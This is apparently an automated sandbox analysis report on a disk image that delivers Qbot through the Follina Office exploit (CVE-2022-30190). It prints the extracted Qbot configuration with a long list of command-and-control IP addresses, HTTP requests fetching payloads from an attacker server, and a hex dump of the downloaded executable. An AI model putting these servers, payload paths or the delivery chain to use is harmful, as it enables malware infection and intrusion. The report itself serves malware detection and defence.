Windows Analysis Report
68101181_048154.img

Overview

General Information

Sample Name: 68101181_048154.img
Analysis ID: 640918
MD5: a623c3499f992a05c4ee5b9b2d3858f8
SHA1: ade8126beb9690929fd253686534b77a97ab4c44
SHA256: c77c63b0ad713ca97776305af4b22cd934271fec00f3c8029bdbbfcf8cd1ed98
Infos:

Detection

CryptOne, Follina CVE-2022-30190, Qbot
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Qbot
Yara detected CryptOne packer
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Contains capabilities to detect virtual machines
Spawns drivers
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

Source: 39.2.regsvr32.exe.4a80000.2.raw.unpack Malware Configuration Extractor: Qbot {"Bot id": "obama186", "Campaign": "1654596660", "Version": "403.694", "C2 list": ["67.165.206.193:993", "63.143.92.99:995", "74.14.5.179:2222", "182.191.92.203:995", "197.89.8.51:443", "89.101.97.139:443", "86.97.9.190:443", "124.40.244.115:2222", "80.11.74.81:2222", "41.215.153.104:995", "179.100.20.32:32101", "31.35.28.29:443", "202.134.152.2:2222", "109.12.111.14:443", "93.48.80.198:995", "120.150.218.241:995", "41.38.167.179:995", "177.94.57.126:32101", "173.174.216.62:443", "1.161.101.20:443", "88.224.254.172:443", "82.41.63.217:443", "67.209.195.198:443", "70.46.220.114:443", "24.178.196.158:2222", "39.44.213.68:995", "84.241.8.23:32103", "210.246.4.69:995", "92.132.172.197:2222", "91.177.173.10:995", "217.128.122.65:2222", "149.28.238.199:995", "45.76.167.26:995", "45.63.1.12:443", "144.202.2.175:443", "45.63.1.12:995", "144.202.3.39:995", "144.202.2.175:995", "45.76.167.26:443", "149.28.238.199:443", "144.202.3.39:443", "140.82.63.183:995", "140.82.63.183:443", "175.145.235.37:443", "85.246.82.244:443", "47.23.89.60:993", "187.207.131.50:61202", "176.67.56.94:443", "148.64.96.100:443", "140.82.49.12:443", "76.70.9.169:2222", "217.164.121.161:2222", "72.27.33.160:443", "108.60.213.141:443", "104.34.212.7:32103", "39.44.158.215:995", "31.48.174.63:2078", "75.99.168.194:61201", "117.248.109.38:21", "83.110.218.147:993", "82.152.39.39:443", "180.129.108.214:995", "5.32.41.45:443", "83.110.92.106:443", "197.164.182.46:993", "196.203.37.215:80", "186.90.153.162:2222", "37.186.54.254:995", "89.211.179.247:2222", "24.139.72.117:443", "201.142.177.168:443", "37.34.253.233:443", "69.14.172.24:443", "125.24.187.183:443", "208.107.221.224:443", "174.69.215.101:443", "76.25.142.196:443", "96.37.113.36:993", "173.21.10.71:2222", "73.151.236.31:443", "45.46.53.140:2222", "189.146.90.232:443", "70.51.135.90:2222", "190.252.242.69:443", "201.145.165.25:443", "47.157.227.70:443", "72.252.157.93:993", "177.205.155.85:443", "72.252.157.93:995", "187.251.132.144:22", "40.134.246.185:995", "24.55.67.176:443", "79.80.80.29:2222", "179.158.105.44:443", "72.252.157.93:990", "89.86.33.217:443", "201.172.23.68:2222", "102.182.232.3:995", "177.156.191.231:443", "39.49.96.122:995", "94.36.193.176:2222", "120.61.1.114:443", "217.164.121.161:1194", "39.41.29.200:995", "86.195.158.178:2222", "86.98.149.168:2222", "1.161.101.20:995", "124.109.35.32:995", "172.115.177.204:2222", "105.27.172.6:443", "32.221.224.140:995", "208.101.82.0:443", "71.24.118.253:443", "143.0.219.6:995", "217.165.176.49:2222", "90.120.65.153:2078", "5.203.199.157:995", "39.52.41.80:995", "148.0.56.63:443", "191.112.25.187:443", "121.7.223.45:2222", "47.156.131.10:443", "177.209.202.242:2222", "41.86.42.158:995", "106.51.48.170:50001", "41.84.229.240:443", "94.71.169.212:995", "111.125.245.116:995", "78.101.193.241:6883", "201.242.175.29:2222", "38.70.253.226:2222", "187.149.236.5:443", "217.165.79.88:443", "85.255.232.18:443", "103.246.242.202:443", "41.230.62.211:995", "67.69.166.79:2222",

Exploits
barindex
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E7589548.htm, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\AEF9D296.htm, type: DROPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: amstream.pdb source: explorer.exe, 00000018.00000003.796658393.0000000004C6F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000018.00000003.796658393.0000000004C6F000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_008BBCFC FindFirstFileW,FindNextFileW, 24_2_008BBCFC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_049BBCFC FindFirstFileW,FindNextFileW, 38_2_049BBCFC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 39_2_04AABCFC FindFirstFileW,FindNextFileW, 39_2_04AABCFC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 40_2_0481BCFC FindFirstFileW,FindNextFileW, 40_2_0481BCFC

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2036726 ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) 185.234.247.119:80 -> 192.168.2.4:49762
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: INTERKONEKT-ASPL INTERKONEKT-ASPL
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 07 Jun 2022 17:22:39 GMTContent-Type: application/octet-streamContent-Length: 1437696Connection: keep-aliveAccept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment;Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 02 11 00 00 ea 04 00 00 00 00 00 90 0d 11 00 00 10 00 00 00 20 11 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 16 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 11 00 ba 25 00 00 00 00 13 00 00 48 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 11 00 6c 53 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 f4 01 11 00 00 10 00 00 00 02 11 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 f8 27 00 00 00 20 11 00 00 28 00 00 00 06 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 71 10 00 00 00 50 11 00 00 00 00 00 00 2e 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ba 25 00 00 00 70 11 00 00 26 00 00 00 2e 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6c 53 01 00 00 a0 11 00 00 54 01 00 00 54 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 48 03 00 00 00 13 00 00 48 03 00 00 a8 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 50 16 00 00 00 00 00 00 f0 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 185.234.247.119Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 185.234.247.119If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMTIf-None-Match: "6299dd5d-1861"Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /1240405476.dat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 185.234.247.119Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 68101181_048154.img String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 68101181_048154.img String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types
Source: regsvr32.exe, 00000026.00000002.580066924.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/vr$
Source: 68101181_048154.img String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 68101181_048154.img String found in binary or memory: http://schemas.xmlsoap.org/soap/http
Source: 68101181_048154.img String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: 68101181_048154.img String found in binary or memory: http://schemas.xmlsoap.org/wsdl/mime/
Source: 68101181_048154.img String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/
Source: 68101181_048154.img String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/#
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: regsvr32.exe, 00000026.00000002.580066924.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000027.00000002.579610608.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000028.00000002.580321314.0000000000907000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.borland.com/namespaces/Types
Source: regsvr32.exe, 00000026.00000002.580066924.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.borland.com/namespaces/Types$r
Source: regsvr32.exe, 00000028.00000002.580138972.00000000007D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.borland.com/namespaces/Types-IWSDLPublish
Source: regsvr32.exe, 00000026.00000002.580066924.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.borland.com/namespaces/Types7r
Source: regsvr32.exe, 00000026.00000002.580066924.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.borland.com/namespaces/TypesAr1
Source: 68101181_048154.img String found in binary or memory: http://www.borland.com/namespaces/TypesU
Source: 68101181_048154.img String found in binary or memory: http://www.borland.com/namespaces/Typeshhttp://www.borland.com/namespaces/Types-IWSDLPublish
Source: regsvr32.exe, 00000026.00000002.580066924.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.borland.com/namespaces/Typeskr
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://api.aadrm.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://api.aadrm.com/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://api.cortana.ai
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://api.office.net
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://api.onedrive.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://augloop.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://augloop.office.com/v2
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://cdn.entity.
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://clients.config.office.net/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://config.edge.skype.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://cortana.ai
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://cortana.ai/api
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://cr.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://dev.cortana.ai
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://devnull.onenote.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://directory.services.
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://graph.windows.net
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://graph.windows.net/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
